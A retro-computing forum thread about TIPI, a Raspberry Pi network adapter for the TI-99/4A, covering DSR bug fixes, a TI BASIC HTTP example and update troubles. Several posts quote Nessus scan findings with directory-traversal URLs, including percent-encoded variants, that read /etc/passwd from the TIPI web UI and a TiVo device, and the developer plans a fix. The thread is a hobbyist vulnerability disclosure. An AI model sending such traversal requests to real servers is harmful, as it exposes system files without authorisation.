+jedimatt42 Posted April 30, 2018 Author Share Posted April 30, 2018 This comes up in conversation on other channels everytime TIPI comes up. It is a great idea. Go for it. I was influenced by GR8NET's CALL NETBLOAD command and this application someone wrote in basic for the MSX: https://www.msx.org/news/en/gr8net-connects-your-msx-to-the-online-msx-rom-database Keep in mind, most EA5 loaders work with PI.http or URIx paths. Tursi's website has an xb scratchpad loader that works. Most of the CALL TIPI code comes from there. You can also load BASIC and XB PROGRAM format files through URIx or PI.http... You can kindof read ascii data this way. Fixed record length works best right now. There are bugs in this. You can do REST queries over http with PI.TCP=hostname:port... See get.bas in examples/tests/basic I think the primary requirements will come from how someone curates the files and metadata to navigate them. The GR8NET for MSX also has a browser that can read apache generated directory listings, and load roms from that. That could be a cool approach as well. TIPI won't load roms of course. It doesn't replace cartridge software. But if the cartridge has already been hacked to run from memory expansion, then you can probably load it off TIPI. -M@ 1 Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 2, 2018 Author Share Posted May 2, 2018 We've noticed that the assembler from good old TI doesn't work with TIPI. It seems that programs writing to FIXED record files, don't always bother to set the character count byte in the PAB. writing to a DF80 file works fine from basic, which sets the outgoing character count, and fails in EA which does not. --- I don't see any confirmation of this in the various relevant specifications. But I observe this under the debugger in classic99 as well. That is, I observe that only one byte in the PAB is >50. Where during a write operation I would expect 2, the record length, and the character count. My plan is to amend the DSR ROM to use the record length as the character count when writing FIXED length records regardless of the PAB's character count value. --- Please tell me if you believe I'm interpreting this wrong.. -M@ Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 2, 2018 Author Share Posted May 2, 2018 Seems to work. -M@ Quote Link to comment Share on other sites More sharing options...
HOME AUTOMATION Posted May 2, 2018 Share Posted May 2, 2018 (edited) We've noticed that the assembler from good old TI doesn't work with TIPI. It seems that programs writing to FIXED record files, don't always bother to set the character count byte in the PAB. writing to a DF80 file works fine from basic, which sets the outgoing character count, and fails in EA which does not. --- I don't see any confirmation of this in the various relevant specifications. But I observe this under the debugger in classic99 as well. That is, I observe that only one byte in the PAB is >50. Where during a write operation I would expect 2, the record length, and the character count. My plan is to amend the DSR ROM to use the record length as the character count when writing FIXED length records regardless of the PAB's character count value. --- Please tell me if you believe I'm interpreting this wrong.. -M@ Sounds good, why didn't I think of that! I am someone who ran into this issue. TIPI and I are getting along better now that I've had a little sleep. Now I assemble in MAME, extract with Ti99Dir.exe, tranfer with TIPI, actually quite painless. Plus better keyboard. If I failed to mention it before... ...TIPI is W-O-N-D-E-R-F-U-L !!! -Looking forward- Edited May 2, 2018 by HOME AUTOMATION 1 Quote Link to comment Share on other sites More sharing options...
BJGuillot Posted May 7, 2018 Share Posted May 7, 2018 I'm trying to use TI BASIC to play with the PI.TCP capabilities as demonstrated in the https://github.com/jedimatt42/tipi/blob/master/examples/tests/basic/get.bassample, but I'm running into a problem in which the TI/TIPI seems to hang and I am never able to receive any INPUT. Even if I type the INPUT statements and loop out the program and just do the PRINT #1 statements, TI BASIC end the program with "** DONE **" but the screen stays green in color but never returns to the ">" prompt. My PI-Version is "1.0betav018" but I had tried using the 016 version before upgrading and ran into the same problem. The TIPI in general seems to have network connectivity, i.e., I can fire up and use CHATTI by doing call tipi("PI.http://myti99.com/CHATTI") from TI BASIC. Is there an easy way to transfer the get.bas sample from GitHub directly into a usable file on my TIPI? Quote Link to comment Share on other sites More sharing options...
ElectricLab Posted May 7, 2018 Share Posted May 7, 2018 BJ I also have. BASIC example that uses TIPI on myti99.com, for what its worth. Its the Rock Paper Scissors game that was mentioned at FestWest. Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 7, 2018 Author Share Posted May 7, 2018 ... Is there an easy way to transfer the get.bas sample from GitHub directly into a usable file on my TIPI? There are two very easy ways... If you go to http://tipi:9900or http://<your-tipi-ip>:9900 you will find a browser UI to navigate and manage the TIPI filesystem. One of the functions in the upper right hand icon set is 'new BASIC file', looks like a document with the classic basic color scheme. enter the name GET.BAS, click create, and then paste in the code: 100 INPUT "Hostname: ":HOST$ 110 INPUT "Port: ":PORT$ 115 INPUT "Path: ":PATH$ 120 CR$ = CHR$(13) 130 LF$ = CHR$(10) 140 OPEN #1:"PI.TCP="&HOST$&":"&PORT$,DISPLAY,VARIABLE 150 PRINT #1:"GET ";PATH$;" HTTP/1.0";CR$;LF$; 160 PRINT #1:"Accept: text/plain, text/html, text/*";CR$;LF$; 170 PRINT #1:CR$;LF$; 180 INPUT #1:L$ 190 PRINT L$; 200 GOTO 180 Press save, and from BASIC you should be able to then OLD TIPI.GET/BAS to load it as a program. Why did I name it GET.BAS ? That leaves it as a text file on the tipi filesystem. Which leads to the other easy way: Tipi has a windows share named 'tipi' mac or linux: smb://tipi/tipi or on windows \\tipi\tipi Here you can just use your favorite tools to put files on the tipi. You can save GET.BAS to the windows share in your favorite text editor, and load it from BASIC as above. If the name from the WebUI is not ending in .BAS then the file will be saved as a PROGRAM IMAGE and you will not be able to edit it through the windows share without special TI oriented tools. -M@ Quote Link to comment Share on other sites More sharing options...
Omega-TI Posted May 27, 2018 Share Posted May 27, 2018 Since everything related to the TIPI is still new and evolving, I'd like to make a suggestion for two additional features, all dependant on the authors time, and agreement that they would be worthwhile additions to his already great program. 1) TIMESTAMP - Most of the time people I use Chatti with are offline at the time I send them a message. It would be useful (I think) if we could press a button to take the time from our RPi and insert it into a message. This way people would know how long ago a message was sent. 2) ROUNDTABLE - A room that allows more than one on one communication. Granted nothing would be private in this room, but it would make for great discussions. Quote Link to comment Share on other sites More sharing options...
ElectricLab Posted May 27, 2018 Share Posted May 27, 2018 Since everything related to the TIPI is still new and evolving, I'd like to make a suggestion for two additional features, all dependant on the authors time, and agreement that they would be worthwhile additions to his already great program. 1) TIMESTAMP - Most of the time people I use Chatti with are offline at the time I send them a message. It would be useful (I think) if we could press a button to take the time from our RPi and insert it into a message. This way people would know how long ago a message was sent. 2) ROUNDTABLE - A room that allows more than one on one communication. Granted nothing would be private in this room, but it would make for great discussions. Good ideas Omega. I do have timestamps for each message stored on the server and they could be displayed, I just opted not to because of screen space. I think I'll save that for the 80col version which I will embark upon once I can get another F18 For the round table, that too is already supportable. I wanted to add the ability to scroll back up on a conversation first, which I think is higher on the priority list. Too many times I've had conversations go on too long (or too fast) and miss some postings as they fly by. 3 Quote Link to comment Share on other sites More sharing options...
Omega-TI Posted May 27, 2018 Share Posted May 27, 2018 I think I'll save that for the 80col version which I will embark upon once I can get another F18 For the round table, that too is already supportable. I wanted to add the ability to scroll back up on a conversation first, which I think is higher on the priority list. Too many times I've had conversations go on too long (or too fast) and miss some postings as they fly by. Oooooooh! My eyes, my eyes, they focused on this and were not able to leave it for a whole minute. I'm drooling like Pavlovs dog over here. Quote Link to comment Share on other sites More sharing options...
jjh76 Posted May 28, 2018 Share Posted May 28, 2018 OK, 3 times now I've hit U in tipi config to try to update to beta 18. Each time it's caused the ti to hang with the tipi's led lighted up when attempting use any of the tipi's functions and I had to re-flash the sd card with beta 12 to get it working again. Haven't tested everything yet but b12 is working as expected so far. I'm using a pi zero w with a new sandisk 8gb sdcard. 1 Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 28, 2018 Author Share Posted May 28, 2018 I have some improvements to this, but was hoping to have a little more to merit an update... I'll skip ahead, and get a new updated image with the upgrade process improvements out... Something I haven't addressed is promoting users to resize their sd-card partition... If you haven't done that, one reason for the catastrophic failure could be too much temporary 3rdparty updates to fit in the 2GB partition that is created by the image. This is the only way that I've reproduced this sort of problem... -M@ Quote Link to comment Share on other sites More sharing options...
jjh76 Posted May 28, 2018 Share Posted May 28, 2018 I've been doing that, and it tells me that the linux partition is 7.4g. Then when I try to do the update, the green led on the zero starts flashing so I know it's accessing the sd card. At this point using call tipi freezes the ti with the tipi led lit up, and the tipi web page is unaccessible. If I power everything down, when the zero reboots I can get to the tipi web page again, and I can tty into the zero with putty, but the tipi just freezes the ti again. 1 Quote Link to comment Share on other sites More sharing options...
+acadiel Posted May 28, 2018 Share Posted May 28, 2018 Found a nice little vulnerability on the Pi distribution with Nessus... probably want to figure out how to address it. Nessus was able to retrieve the remote host's password file using the following URL : - http://192.168.86.54:9900/../../../../../../../../../../../../etc/passwd Here are the contents : ------------------------------ snip ------------------------------ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false pi:x:1000:1000:,,,:/home/pi:/bin/bash messagebus:x:105:109::/var/run/dbus:/bin/false statd:x:106:65534::/var/lib/nfs:/bin/false sshd:x:107:65534::/run/sshd:/usr/sbin/nologin avahi:x:108:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false tipi:x:999:996::/home/tipi: telnetd:x:109:114::/nonexistent:/bin/false ------------------------------ snip ------------------------------ Note that Nessus stopped searching after one exploit was found. To report all known exploits, enable the 'Perform thorough tests' setting and re-scan. 2 Quote Link to comment Share on other sites More sharing options...
jjh76 Posted May 28, 2018 Share Posted May 28, 2018 Ok, switched the card over to my 3B+ and was able to do the update. Switched back to the zero and it runs fine now. So for some reason the updater doesn't like my zero? Quote Link to comment Share on other sites More sharing options...
+mizapf Posted May 28, 2018 Share Posted May 28, 2018 Found a nice little vulnerability on the Pi distribution with Nessus... probably want to figure out how to address it. You can escape the DocumentRoot? That's a misconfiguration for sure. I just wonder why it takes that many parent dir steps. Quote Link to comment Share on other sites More sharing options...
+arcadeshopper Posted May 28, 2018 Share Posted May 28, 2018 Ok, switched the card over to my 3B+ and was able to do the update. Switched back to the zero and it runs fine now. So for some reason the updater doesn't like my zero?It's probably just taking forever on the zero I did mine yesterday and it will reboot the pi when it is done Sent from my LG-H872 using Tapatalk 1 Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 28, 2018 Author Share Posted May 28, 2018 If you reboot the PI while the TIPI services are still offline, recovery is most certainly doomed. The update doesn't actually reboot the PI, it does eventually stop the TIPI services and then restart those. Most of the update process is downloading and installing latest third party libraries, and recompiling some of mine. If you reboot the PI while this is going on, you will most likely end up with a dead sd-card image. -M@ Quote Link to comment Share on other sites More sharing options...
+acadiel Posted May 28, 2018 Share Posted May 28, 2018 If you reboot the PI while the TIPI services are still offline, recovery is most certainly doomed. The update doesn't actually reboot the PI, it does eventually stop the TIPI services and then restart those. Most of the update process is downloading and installing latest third party libraries, and recompiling some of mine. If you reboot the PI while this is going on, you will most likely end up with a dead sd-card image. -M@ Maybe fire up some kind of update monitoring daemon that checks a flat file that has the progress of the update every minute or so and update the PI interface with that? Or are the executables that the DSR uses completely offline during the update? 1 Quote Link to comment Share on other sites More sharing options...
+acadiel Posted May 28, 2018 Share Posted May 28, 2018 You can escape the DocumentRoot? That's a misconfiguration for sure. I just wonder why it takes that many parent dir steps. It's quite interesting... had two critical findings with Nessus on my home network. This and the TiVo Stream appliance both had the same "escape the DocumentURLRoot". Tivo's looked like this, and I tried to report it, but got some customer support drone who wanted to send me to a 'feature request' site. LOL. Nessus was able to retrieve the remote host's password file using the following URLs : - http://192.168.86.36/../../../../../../../../../../../../etc/passwd - http://192.168.86.36/./../../../../../../../../../../../etc/passwd - http://192.168.86.36//../../../../../../../../../../../../etc/passwd - http://192.168.86.36/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd - http://192.168.86.36/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - http://192.168.86.36/.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - http://192.168.86.36/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd Here are the contents : ------------------------------ snip ------------------------------ # Copyright 2012 TiVo Inc. All Rights Reserved root:x:0:0:root:.:/dev/null somebody:x:1:1:somebody:.:/dev/null nobody:x:99:99:nobody:.:/dev/null ------------------------------ snip ------------------------------ 1 Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 28, 2018 Author Share Posted May 28, 2018 Maybe fire up some kind of update monitoring daemon that checks a flat file that has the progress of the update every minute or so and update the PI interface with that? Or are the executables that the DSR uses completely offline during the update? The DSR is offline during the upgrade. But the Raspberry PI can still write to a couple shift registers that are memory mapped into the TI.. so Instead of 'locking-up' the TI ( which is really just waiting for the service to restart ) I can set a flag in the registers that indicate update is still in progress, and let the TIPICFG tool run a spinner until it sees that the registers have been cleared by the service restarting. -M@ 2 Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 28, 2018 Author Share Posted May 28, 2018 It's quite interesting... had two critical findings with Nessus on my home network. This and the TiVo Stream appliance both had the same "escape the DocumentURLRoot". Tivo's looked like this, and I tried to report it, but got some customer support drone who wanted to send me to a 'feature request' site. LOL. Nessus was able to retrieve the remote host's password file using the following URLs : - http://192.168.86.36/../../../../../../../../../../../../etc/passwd - http://192.168.86.36/./../../../../../../../../../../../etc/passwd - http://192.168.86.36//../../../../../../../../../../../../etc/passwd - http://192.168.86.36/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd - http://192.168.86.36/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - http://192.168.86.36/.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd - http://192.168.86.36/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd Here are the contents : ------------------------------ snip ------------------------------ # Copyright 2012 TiVo Inc. All Rights Reserved root:x:0:0:root:.:/dev/null somebody:x:1:1:somebody:.:/dev/null nobody:x:99:99:nobody:.:/dev/null ------------------------------ snip ------------------------------ Corey warned me... I didn't put too much time into this, but yes, the web-ui allows downloading a file, and I don't clean URLs before hand... I didn't test, but was hoping a relatively modern framework like FLASK wouldn't allow it... In my day job we always slap in servlet filters that reject any request with potentially malicious paths or query parameters. I'll look at what is available for flask, or do something myself. -M@ 1 Quote Link to comment Share on other sites More sharing options...
Omega-TI Posted May 28, 2018 Share Posted May 28, 2018 I think I'll save that for the 80col version which I will embark upon once I can get another F18 Oh since the 80 column version can have 25 lines, could offer one more suggestion? A) On the top line (left justified), every time it updates, display the RPi's current Time & Date. B) On the same line (right justified), the current local temperature. The program could have a setting for the users ZIP CODE, which can be used with various services to obtain the temperature. This might encourage people to leave Chatti on longer. Quote Link to comment Share on other sites More sharing options...
+jedimatt42 Posted May 28, 2018 Author Share Posted May 28, 2018 On the progress side, I was able to get the TIPI-PEB version working Friday, and then the last issue fixed today. There are 2 issues with the pcb design, both fairly easily worked around. Woot! -M@ 8 Quote Link to comment Share on other sites More sharing options...
ElectricLab Posted May 28, 2018 Share Posted May 28, 2018 Flask is a minimalist framework and we're running it standalone (not via Apache) so there's no protection from shooting yourself in the foot. This is easy to fix if you want to assign it to me. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.